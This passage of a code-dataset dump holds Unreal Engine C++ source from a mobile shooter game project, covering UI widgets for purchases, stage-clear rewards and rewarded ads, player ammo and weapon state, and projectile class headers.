Text_TitleName);\n\tText_TitleName->SetText(FText::FromString(kTitle));\n}\n\nvoid UPG_UserWidgetBuyPopup::SetPrice(int32 nPrice)\n{\n\tABCHECK(nullptr != Text_Price);\n\tText_Price->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nPrice)));\n}\n\nvoid UPG_UserWidgetBuyPopup::SetDescription(FString kDescription)\n{\n\tABCHECK(nullptr != Text_Description);\n\tText_Description->SetText(FText::FromString(kDescription));\n}\n\nvoid UPG_UserWidgetBuyPopup::SetValue(int32 nValue)\n{\n\tm_nValue = nValue;\n}\n\nvoid UPG_UserWidgetBuyPopup::OnBtnOK()\n{\n\tOnBtnClickedOK.Broadcast(m_nValue);\n}\n\nvoid UPG_UserWidgetBuyPopup::OnBtnCancel()\n{\n\tOnOnBtnClickedCancel.Broadcast(m_nValue);\n}" }, { "alpha_fraction": 0.7691331505775452, "alphanum_fraction": 0.7796759009361267, "avg_line_length": 31.62738800048828, "blob_id": "81ca42766f5959855e3089531fb95855f4d37a68", "content_id": "fd40ff77a92d810bb042ed9de9459a922cd6e6b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 10346, "license_type": "no_license", "max_line_length": 102, "num_lines": 314, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetStageClear.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", 
"src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetStageClear.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n\n#include <Components/Overlay.h>\n#include <Components/TextBlock.h>\n#include <Components/Button.h>\n\nvoid UPG_UserWidgetStageClear::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\tOverlay_ActiveFlag = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_ActiveFlag\")));\n\tABCHECK(nullptr != Overlay_ActiveFlag);\n\tOverlay_DeActiveFlag = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_DeActiveFlag\")));\n\tABCHECK(nullptr != Overlay_DeActiveFlag);\n\tOverlay_ActiveTime = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_ActiveTime\")));\n\tABCHECK(nullptr != Overlay_ActiveTime);\n\tOverlay_DeActiveTime = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_DeActiveTime\")));\n\tABCHECK(nullptr != Overlay_DeActiveTime);\n\tOverlay_ActiveLethal = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_ActiveLethal\")));\n\tABCHECK(nullptr != Overlay_ActiveLethal);\n\tOverlay_DeActiveLethal = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_DeActiveLethal\")));\n\tABCHECK(nullptr != Overlay_DeActiveLethal);\n\n\tm_pBtn_ViewAD = Cast<UButton>(GetWidgetFromName(TEXT(\"Btn_ViewAD\")));\n\tABCHECK(nullptr != m_pBtn_ViewAD);\n\n\tABCHECK(nullptr != Text_BonusFlag);\n\tABCHECK(nullptr != Text_BonusLethal);\n\tABCHECK(nullptr != Text_BonusTime);\n\tABCHECK(nullptr != Text_BonusStageClear);\n\tABCHECK(nullptr != Text_BonusKill);\n\tABCHECK(nullptr != Text_BonusStar);\n\tABCHECK(nullptr != Text_CaptionBonusAD);\n\tABCHECK(nullptr != Text_BonusAD);\n\tABCHECK(nullptr != Text_ClearADTimer);\n\tABCHECK(nullptr != Text_TotalReward);\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\tpGameStateStage->OnViewAD.AddUObject(this, &UPG_UserWidgetStageClear::OnViewResultAD);\n}\n\nvoid UPG_UserWidgetStageClear::NativeTick(const FGeometry& MyGeometry, float DeltaTime)\n{\n\tSuper::NativeTick(MyGeometry, DeltaTime);\n\t\n\tif (false == m_bWasViewStageClear3X)\n\t{\n\t\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\t\tABCHECK(nullptr != pGameInstance);\n\n\t\tint32 nRemainTime = pGameInstance->GetADRemainTime(EADType::eAT_StageClear3X);\n\t\tSetBtnBonusADTime(nRemainTime);\n\t\tSetBtnEnableAD((nRemainTime <= 0));\n\t}\n}\n\nbool UPG_UserWidgetStageClear::IsAbleViewStagePlayAD()\n{\n\tif (m_bWasViewStageClear3X)\n\t{\n\t\t// 스테이지 클리어 후 보상형 광고를 보았으면 스테이지 플레이 광고를 볼 수 없다.\n\t\treturn false;\n\t}\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\treturn pGameInstance->IsAbleADView(EADType::eAT_StagePlayAD);\n}\n\nvoid UPG_UserWidgetStageClear::OnBtnRetry()\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tpGameModeStage->SavePlayerData();\n\tpGameModeStage->SaveStageData();\n\tpGameModeStage->StartGame_NextStage();\n}\n\nvoid UPG_UserWidgetStageClear::OnBtnGoToMainLobby()\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tpGameModeStage->SavePlayerData();\n\tpGameModeStage->SaveStageData();\n\n\tUGameplayStatics::OpenLevel(GetWorld(), 
TEXT(\"/Game/PG/Maps/Lobby/MainLobby\"));\n}\n\nvoid UPG_UserWidgetStageClear::OnBtnNextStage()\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tpGameModeStage->SavePlayerData();\n\tpGameModeStage->SaveStageData();\n\tpGameModeStage->StartGame_NextStage();\n}\n\nvoid UPG_UserWidgetStageClear::OnBtnViewAD()\n{\n\n}\n\nvoid UPG_UserWidgetStageClear::OnADRewardVideoSucessed()\n{\n\tm_bWasViewStageClear3X = true;\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\n\t// 보상 적용\n\tpGameStateStage->RequestViewAD();\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\t// 타이머 리셋\n\tpGameInstance->ResetADRemainTime(EADType::eAT_StageClear3X);\n\n\tSetBtnEnableAD(false);\n}\n\nvoid UPG_UserWidgetStageClear::OnADRewardVideoClosed()\n{\n\n}\n\nvoid UPG_UserWidgetStageClear::OnADPlayStageVideoSucessed()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tpGameInstance->ResetADRemainTime(EADType::eAT_StagePlayAD);\n}\n\nvoid UPG_UserWidgetStageClear::OnADPlayStageVideoClosed()\n{\n\n}\n\nvoid UPG_UserWidgetStageClear::OnViewResultAD(bool bEnable)\n{\n\tUpdateClearStageLayout();\n}\n\nvoid UPG_UserWidgetStageClear::UpdateClearStageLayout()\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tauto pTableStageData = pGameInstance->GetTableStageData(pGameModeStage->GetPlayStageID());\n\tABCHECK(nullptr != pTableStageData);\n\n\t// 몬스터 킬\n\tbool bIsClearAmount = pGameModeStage->IsClearMission(EStageClearType::eSCT_AmountKill);\n\tbool bIsWasClearAmount = pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_AmountKill);\n\tif (bIsClearAmount || bIsWasClearAmount)\n\t{\n\t\tOverlay_ActiveFlag->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tOverlay_DeActiveFlag->SetVisibility(ESlateVisibility::Hidden);\n\n\t\tSetBonusFlag(bIsWasClearAmount, pTableStageData->StarReward);\n\t}\n\telse\n\t{\n\t\tOverlay_ActiveFlag->SetVisibility(ESlateVisibility::Hidden);\n\t\tOverlay_DeActiveFlag->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t}\n\n\t// 필살기\n\tbool bIsClearLethal = pGameModeStage->IsClearMission(EStageClearType::eSCT_Lethal);\n\tbool bIsWasClearLethal = pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_Lethal);\n\tif (bIsClearLethal || bIsWasClearLethal)\n\t{\n\t\tOverlay_ActiveLethal->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tOverlay_DeActiveLethal->SetVisibility(ESlateVisibility::Hidden);\n\t\tSetBonusLethal(bIsWasClearLethal, pTableStageData->StarReward);\n\t}\n\telse\n\t{\n\t\tOverlay_ActiveLethal->SetVisibility(ESlateVisibility::Hidden);\n\t\tOverlay_DeActiveLethal->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t}\n\t\n\t// 시간 \n\tbool bIsClearTime = pGameModeStage->IsClearMission(EStageClearType::eSCT_ClearTime);\n\tbool bIsWasClearTime = pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_ClearTime);\n\tif (bIsClearTime || bIsWasClearTime)\n\t{\n\t\tOverlay_ActiveTime->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tOverlay_DeActiveTime->SetVisibility(ESlateVisibility::Hidden);\n\t\tSetBonusTime(bIsWasClearTime, 
pTableStageData->StarReward);\n\t}\n\telse\n\t{\n\t\tOverlay_ActiveTime->SetVisibility(ESlateVisibility::Hidden);\n\t\tOverlay_DeActiveTime->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t}\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\t\n\tSetBonusStageClear(pGameStateStage->GetClearStagePoint());\n\tSetBonusMonsterKill(pGameStateStage->GetClearMonsterKillPoint());\n\tSetBonusStar(pGameStateStage->GetClearMissionPoint());\n\tSetBonusAD(pGameStateStage->IsViewAD());\n\tSetTotalReward(pGameStateStage->GetClearTotalPoint());\n}\n\nvoid UPG_UserWidgetStageClear::SetBonusStageClear(int32 nStageClearBonus)\n{\n\tABCHECK(nullptr != Text_BonusStageClear);\n\tText_BonusStageClear->SetText(FText::FromString(FString::Printf(TEXT(\"+%d\"), nStageClearBonus)));\n}\n\nvoid UPG_UserWidgetStageClear::SetBonusMonsterKill(int32 nMonsterKillBonus)\n{\n\tABCHECK(nullptr != Text_BonusKill);\n\tText_BonusKill->SetText(FText::FromString(FString::Printf(TEXT(\"+%d\"), nMonsterKillBonus)));\n}\n\nvoid UPG_UserWidgetStageClear::SetBonusStar(int32 nStarBonus)\n{\n\tABCHECK(nullptr != Text_BonusStar);\n\tText_BonusStar->SetText(FText::FromString(FString::Printf(TEXT(\"+%d\"), nStarBonus)));\n}\n\nvoid UPG_UserWidgetStageClear::SetBonusAD(bool bEnable)\n{\n\tABCHECK(nullptr != Text_CaptionBonusAD);\n\tABCHECK(nullptr != Text_BonusAD);\n\n\tif (bEnable)\n\t{\n\t\tText_CaptionBonusAD->SetColorAndOpacity(FSlateColor(FLinearColor(0.000000f, 0.270706f, 1.000000f)));\n\t\tText_BonusAD->SetColorAndOpacity(FSlateColor(FLinearColor(0.000000f, 0.270706f, 1.000000f)));\n\t}\n\telse\n\t{\n\t\tText_CaptionBonusAD->SetColorAndOpacity(FSlateColor(FLinearColor(0.157986f, 0.157986f, 0.157986f)));\n\t\tText_BonusAD->SetColorAndOpacity(FSlateColor(FLinearColor(0.157986f, 0.157986f, 0.157986f)));\n\t}\n}\n\nvoid UPG_UserWidgetStageClear::SetBtnBonusADTime(int32 nTime)\n{\n\tABCHECK(nullptr != Text_ClearADTimer);\n\tText_ClearADTimer->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nTime)));\n}\n\nvoid UPG_UserWidgetStageClear::SetBtnEnableAD(bool bEnable)\n{\n\tABCHECK(nullptr != m_pBtn_ViewAD);\n\n\tif (m_pBtn_ViewAD->bIsEnabled != bEnable)\n\t\tm_pBtn_ViewAD->SetIsEnabled(bEnable);\n\n\tABCHECK(nullptr != Text_ClearADTimer);\n\tif (bEnable)\n\t\tText_ClearADTimer->SetVisibility(ESlateVisibility::Hidden);\n\telse\n\t\tText_ClearADTimer->SetVisibility(ESlateVisibility::HitTestInvisible);\n}\n\nvoid UPG_UserWidgetStageClear::SetTotalReward(int32 nTotalReward)\n{\n\tABCHECK(nullptr != Text_TotalReward);\n\tText_TotalReward->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nTotalReward)));\n}\n\nvoid UPG_UserWidgetStageClear::SetBonusFlag(bool bWasClear, int32 nBonus)\n{\n\tABCHECK(nullptr != Text_BonusFlag);\n\tText_BonusFlag->SetText(FText::FromString(FString::Printf(TEXT(\"+%d\"), nBonus)));\n\n\tif (bWasClear)\n\t\tText_BonusFlag->SetVisibility(ESlateVisibility::Hidden);\n\telse\n\t\tText_BonusFlag->SetVisibility(ESlateVisibility::HitTestInvisible);\n}\n\nvoid UPG_UserWidgetStageClear::SetBonusLethal(bool bWasClear, int32 nBonus)\n{\n\tABCHECK(nullptr != Text_BonusLethal);\n\tText_BonusLethal->SetText(FText::FromString(FString::Printf(TEXT(\"+%d\"), nBonus)));\n\n\tif (bWasClear)\n\t\tText_BonusLethal->SetVisibility(ESlateVisibility::Hidden);\n\telse\n\t\tText_BonusLethal->SetVisibility(ESlateVisibility::HitTestInvisible);\n}\n\nvoid UPG_UserWidgetStageClear::SetBonusTime(bool bWasClear, int32 nBonus)\n{\n\tABCHECK(nullptr != 
Text_BonusTime);\n\tText_BonusTime->SetText(FText::FromString(FString::Printf(TEXT(\"+%d\"), nBonus)));\n\n\tif (bWasClear)\n\t\tText_BonusTime->SetVisibility(ESlateVisibility::Hidden);\n\telse\n\t\tText_BonusTime->SetVisibility(ESlateVisibility::HitTestInvisible);\n}" }, { "alpha_fraction": 0.7568368315696716, "alphanum_fraction": 0.7723336219787598, "avg_line_length": 29.685314178466797, "blob_id": "0cac92c9fd4793230952e8b81f85c0aaf78deec0", "content_id": "4ea786ebc4304635f8dfc0a3e2b5d138b545138e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4446, "license_type": "no_license", "max_line_length": 133, "num_lines": 143, "path": "/Source/Project_Gun/Private/Player/PlayerState/PG_MyPlayerState.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n#include \"Character/PG_MyChar.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n#include \"BlueScriptObject/LethalAttack/PG_LethalAttack.h\"\n\nAPG_MyPlayerState::APG_MyPlayerState()\n{\n}\n\nvoid APG_MyPlayerState::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\tABCHECK(InitPlayerData());\n}\n\nvoid APG_MyPlayerState::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\nbool APG_MyPlayerState::InitPlayerData()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pGameMode = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameMode, false);\n\n\tauto pPlayerSaveData = pGameMode->GetSavePlayerData();\n\tABCHECK(nullptr != pPlayerSaveData, false);\n\n\tm_kOrignalPlayerData.RewardPoint = pPlayerSaveData->m_nRewardPoint;\n\tm_kOrignalPlayerData.EquipWeaponInventoryIndex = 0;// pPlayerSaveData->m_nEquipWeaponSlotIndex;\n\tm_kOrignalPlayerData.PlayerWeaponInventory = pPlayerSaveData->m_kEquipWeaponTableIndex;\n\tm_kOrignalPlayerData.bExtendWeaponSlot = pPlayerSaveData->m_bExtendWeaponSlot;\n\n\tfor (int32 nIndex = 0; nIndex < PG_MAX_WEAPON_SLOT; ++nIndex)\n\t{\n\t\tm_kOrignalPlayerData.PlayerWeaponAmmo[nIndex] = pGameMode->GetMaxAmmo(pPlayerSaveData->m_kEquipWeaponTableIndex[nIndex]);\n\t}\n\n\tm_kPlayingPlayerData = m_kOrignalPlayerData;\n\n\treturn true;\n}\n\nvoid APG_MyPlayerState::MonsterKill(APG_MonChar* KillMon)\n{\n\tABCHECK(nullptr != KillMon);\n\tint32 nRandIndex = FMath::RandRange(0, 100);\n\tint32 nDropRate = (int32)(KillMon->GetDropRate() * 100.0f);\n\tif (nRandIndex <= nDropRate)\n\t{\n\t\tfloat fDropRate = KillMon->GetDropRate();\n\t\tint32 GetRewardPoint = (fDropRate < 1.0f) ? 1 : (int32)fDropRate;\n\t\tAddRewardPoint(GetRewardPoint);\n\t\tOnKillAddRewardPoint.Broadcast(GetRewardPoint);\n\t\tABLOG(Warning, TEXT(\"Get Reward Point : %d\"), GetRewardPoint);\n\t}\n\t\n\tOnDefaultAttackMonsterKill.Broadcast(KillMon);\n}\n\nvoid APG_MyPlayerState::MonsterLethalAttackKill(APG_MonChar* KillMon)\n{\n\tABCHECK(nullptr != KillMon);\n\tint32 nRandIndex = FMath::RandRange(0, 100);\n\tint32 nDropRate = (int32)(KillMon->GetDropRate() * 100.0f);\n\tif (nRandIndex <= nDropRate)\n\t{\n\t\tfloat fDropRate = KillMon->GetDropRate();\n\t\tint32 GetRewardPoint = (fDropRate < 1.0f) ? 
1 : (int32)fDropRate;\n\t\tAddRewardPoint(GetRewardPoint);\n\t\tOnKillAddRewardPoint.Broadcast(GetRewardPoint);\n\t\tABLOG(Warning, TEXT(\"Get Reward Point (Lethal Attack) : %d\"), GetRewardPoint);\n\t}\n}\n\nvoid APG_MyPlayerState::AddRewardPoint(int32 a_nAddPoint)\n{\n\tif (0 == a_nAddPoint)\n\t\treturn;\n\n\tm_kPlayingPlayerData.RewardPoint += a_nAddPoint;\n\tOnUpdateRewardPoint.Broadcast();\n}\n\nvoid APG_MyPlayerState::SetRewardPoint(int32 a_nSetPoint)\n{\n\tm_kPlayingPlayerData.RewardPoint = a_nSetPoint;\n\tOnUpdateRewardPoint.Broadcast();\n}\n\nbool APG_MyPlayerState::UseAmmo()\n{\n\tint32 nEquipTableIndex = m_kPlayingPlayerData.EquipWeaponInventoryIndex;\n\n\tif (PG_INFINITY_AMMO == m_kPlayingPlayerData.PlayerWeaponAmmo[nEquipTableIndex])\n\t\treturn true;\t\t// 무한으로 총알을 사용할 수 있는 무기여서 탄약 소모가 필요 없으므로 return\n\n\tif (m_kPlayingPlayerData.PlayerWeaponAmmo[nEquipTableIndex] <= 0)\n\t\treturn false;\n\n\tm_kPlayingPlayerData.PlayerWeaponAmmo[nEquipTableIndex] -= 1;\n\n\treturn true;\n}\n\nvoid APG_MyPlayerState::ChangeDefaultWeapon()\n{\n\tm_kPlayingPlayerData.EquipWeaponInventoryIndex = 0;\n\tChangeWeapon(m_kPlayingPlayerData.EquipWeaponInventoryIndex, 0);\n}\n\nbool APG_MyPlayerState::ChangeWeapon(int32 nSlotIndex, int32 nWeaponTableIndex)\n{\n\tif (PG_INFINITY_AMMO != m_kPlayingPlayerData.PlayerWeaponAmmo[nSlotIndex] && 0 >= m_kPlayingPlayerData.PlayerWeaponAmmo[nSlotIndex])\n\t\treturn false;\n\n\tm_kPlayingPlayerData.EquipWeaponInventoryIndex = nSlotIndex;\n\tOnChangeWeapon.Broadcast(nWeaponTableIndex);\n\n\treturn true;\n}\n\nvoid APG_MyPlayerState::ReadyToUseTheSkill()\n{\n\t//GEngine->AddOnScreenDebugMessage(-1, 1.0f, FColor::Yellow, TEXT(\"Ready To Use The Skill\"));\n\tOnReadyToUseTheLethalAttack.Broadcast();\n}\n\nvoid APG_MyPlayerState::TryUseTheSkill()\n{\n\t//GEngine->AddOnScreenDebugMessage(-1, 1.0f, FColor::Yellow, TEXT(\"Try Use The Skill\"));\n\tOnTryUseTheLethalAttack.Broadcast();\n}\n" }, { "alpha_fraction": 0.7684138417243958, "alphanum_fraction": 0.7704693675041199, "avg_line_length": 27.34951400756836, "blob_id": "480fe0ab423a3e4f05e4a44bf48d195d8a1f08fd", "content_id": "37cfdeb6eb63e9a7859a7e7d8d27645ce051fdf7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2927, "license_type": "no_license", "max_line_length": 99, "num_lines": 103, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetWeaponBox.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetWeaponBox.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n\n#include <Components/Button.h>\n#include <Components/Image.h>\n#include <Components/TextBlock.h>\n#include <Components/Overlay.h>\n\nvoid UPG_UserWidgetWeaponBox::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tPG_WIDGET_LINK(UButton, Btn_Weapon);\n\tPG_WIDGET_LINK(UImage, Img_IconAmmo);\n\tPG_WIDGET_LINK(UTextBlock, Text_Ammo);\n\tPG_WIDGET_LINK(UOverlay, OverlayLightBox);\n\n\tm_pkBtn_Weapon->OnClicked.AddDynamic(this, &UPG_UserWidgetWeaponBox::OnBtnWeaponClicked);\n}\n\nvoid UPG_UserWidgetWeaponBox::SetWeaponIndex(class APG_GameModeBase* pGameMode, int32 nWeaponIndex)\n{\n\tABCHECK(nullptr != pGameMode);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tm_pGameMode = pGameMode;\n\tWeaponIndex = nWeaponIndex;\n\n\tconst 
FPGWeaponTableData* pWeaponShopData = pGameInstance->GetWeaponTableData(nWeaponIndex);\n\tif (nullptr == pWeaponShopData)\n\t{\n\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), nWeaponIndex);\n\t\tSetEnable(false);\n\t\treturn;\n\t}\n\n\tif (pWeaponShopData->ServiceOpen && pGameMode->IsUnlockWeapon(nWeaponIndex))\n\t{\n\t\tSetEnable(true);\n\t\tm_pkBtn_Weapon->WidgetStyle.SetNormal(pWeaponShopData->WeaponImage);\n\t\tm_pkBtn_Weapon->WidgetStyle.SetHovered(pWeaponShopData->WeaponImage);\n\t\tm_pkBtn_Weapon->WidgetStyle.SetPressed(pWeaponShopData->WeaponImage);\n\n\t\tSetAmmo(pGameMode->GetMaxAmmo(nWeaponIndex));\n\t}\n\telse\n\t{\n\t\tSetEnable(false);\n\t}\n}\n\nvoid UPG_UserWidgetWeaponBox::SetSlotIndex(int32 nSlotIndex)\n{\n\tSlotIndex = nSlotIndex;\n}\n\nvoid UPG_UserWidgetWeaponBox::SetAmmo(int32 nAmmo)\n{\n\t// 무한대\n\tif (nAmmo == PG_INFINITY_AMMO)\n\t\tm_pkText_Ammo->SetText(FText::FromString(FString::Printf(TEXT(\" X ---\"))));\n\telse\n\t\tm_pkText_Ammo->SetText(FText::FromString(FString::Printf(TEXT(\" X %d\"), nAmmo)));\n}\n\nvoid UPG_UserWidgetWeaponBox::SetEnable(bool bEnable)\n{\n\tif (bEnable)\n\t{\n\t\tm_pkBtn_Weapon->SetVisibility(ESlateVisibility::Visible);\n\t\tm_pkBtn_Weapon->SetIsEnabled(true);\n\n\t\tm_pkImg_IconAmmo->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tm_pkText_Ammo->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t}\n\telse\n\t{\n\t\tm_pkBtn_Weapon->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tm_pkBtn_Weapon->SetIsEnabled(false);\n\n\t\tm_pkImg_IconAmmo->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pkText_Ammo->SetVisibility(ESlateVisibility::Hidden);\n\t}\n}\n\nvoid UPG_UserWidgetWeaponBox::SetEnableLightBox(bool bEnable)\n{\n\tif (bEnable)\n\t\tm_pkOverlayLightBox->SetVisibility(ESlateVisibility::Visible);\n\telse\n\t\tm_pkOverlayLightBox->SetVisibility(ESlateVisibility::Hidden);\n}\n\nvoid UPG_UserWidgetWeaponBox::OnBtnWeaponClicked()\n{\n\tOnBtnWeaponClicked_WeaponIndex.Broadcast(WeaponIndex);\n\tOnBtnWeaponClicked_SlotIndex.Broadcast(SlotIndex);\n}" }, { "alpha_fraction": 0.7916666865348816, "alphanum_fraction": 0.7927489280700684, "avg_line_length": 32, "blob_id": "c3ae8146ee945704c05de71f4a440b4e162a69cf", "content_id": "e81550759cb14e73d751fcfdc0afd6eb600ee45a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1952, "license_type": "no_license", "max_line_length": 193, "num_lines": 56, "path": "/Source/Project_Gun/Public/BlueScriptObject/Projectile/PG_Projectile.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <GameFramework/Actor.h>\n#include <GameFramework/ProjectileMovementComponent.h>\n#include \"PG_Projectile.generated.h\"\n\nUCLASS()\nclass PROJECT_GUN_API APG_Projectile : public AActor\n{\n\tGENERATED_BODY()\n\t\npublic:\t\n\tAPG_Projectile();\n\tvirtual void Tick(float DeltaTime) override;\t// Called every frame\n\nprotected:\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void BeginPlay() override;\t// Called when the game starts or when spawned\n\npublic:\t\n\t// 발사체의 속도를 발사 방향으로 초기화시킵니다.\n\tvirtual void FireInDirection(const struct FPGWeaponData* pWeaponData, const FVector& ShootDirection, bool bMonsterWeapon = false);\n\nprotected:\n\tbool IsEndBulletRange();\t// 발사체가 도달하는 최대 범위 검사\n\tbool IsOwnerMonster();\n\tbool 
IsOwnerMyPlayer();\n\tbool IsAttackNullity(FVector vTargetPos);\t\t// 공격 무효여부 검사\n\nprotected :\n\tUFUNCTION()\n\tvirtual void OnTargetBeginOverlap(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult);\n\n\tUFUNCTION()\n\tvirtual void OnTargetHit(UPrimitiveComponent* HitComponent, AActor* OtherActor, UPrimitiveComponent* OtherComp, FVector NormalImpulse, const FHitResult& Hit);\n\n\tUFUNCTION()\n\tvirtual void OnPlayEndParticle(UParticleSystemComponent* ParticleSystemComponent);\n\nprotected :\n\t// 구체 콜리전 컴포넌트\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG ProjectileData\", Meta = (AllowPrivateAccess = true))\n\tUSphereComponent* CollisionComponent;\n\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG ProjectileData\", Meta = (AllowPrivateAccess = true))\n\tbool IsMonsterFire;\n\n\tUPROPERTY(VisibleAnywhere)\n\tstruct FPGWeaponData WeaponData;\n\n\tFVector vStartPos = FVector::ZeroVector;\n};\n" }, { "alpha_fraction": 0.7521613836288452, "alphanum_fraction": 0.7521613836288452, "avg_line_length": 19.41176414489746, "blob_id": "c788f383b763d1afb68c5e1f875a349dc1a70c00", "content_id": "4008b55fe3792522f3cc71cdf65f7599d345e87f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 349, "license_type": "no_license", "max_line_length": 79, "num_lines": 17, "path": "/Source/Project_Gun/Public/BlueScriptObject/Projectile/PG_ProjectileLaserBem.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"BlueScriptObject/Projectile/PG_Projectile.h\"\n\n#include \"PG_ProjectileLaserBem.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_ProjectileLaserBem : public APG_Projectile\n{\n\tGENERATED_BODY()\n};\n" }, { "alpha_fraction": 0.7473779916763306, "alphanum_fraction": 0.753305971622467, "avg_line_length": 28.738983154296875, "blob_id": "04a6e46caf530f2d80c30519e85312d8f01d0027", "content_id": "87a91f0ca3c27e128cd86d17919c5a11e25cafb2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9164, "license_type": "no_license", "max_line_length": 114, "num_lines": 295, "path": "/Source/Project_Gun/Private/Game/GameState/PG_GameStateStage.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Game/GameState/PG_GameStateStage.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Character/PG_MonCharDivision.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include 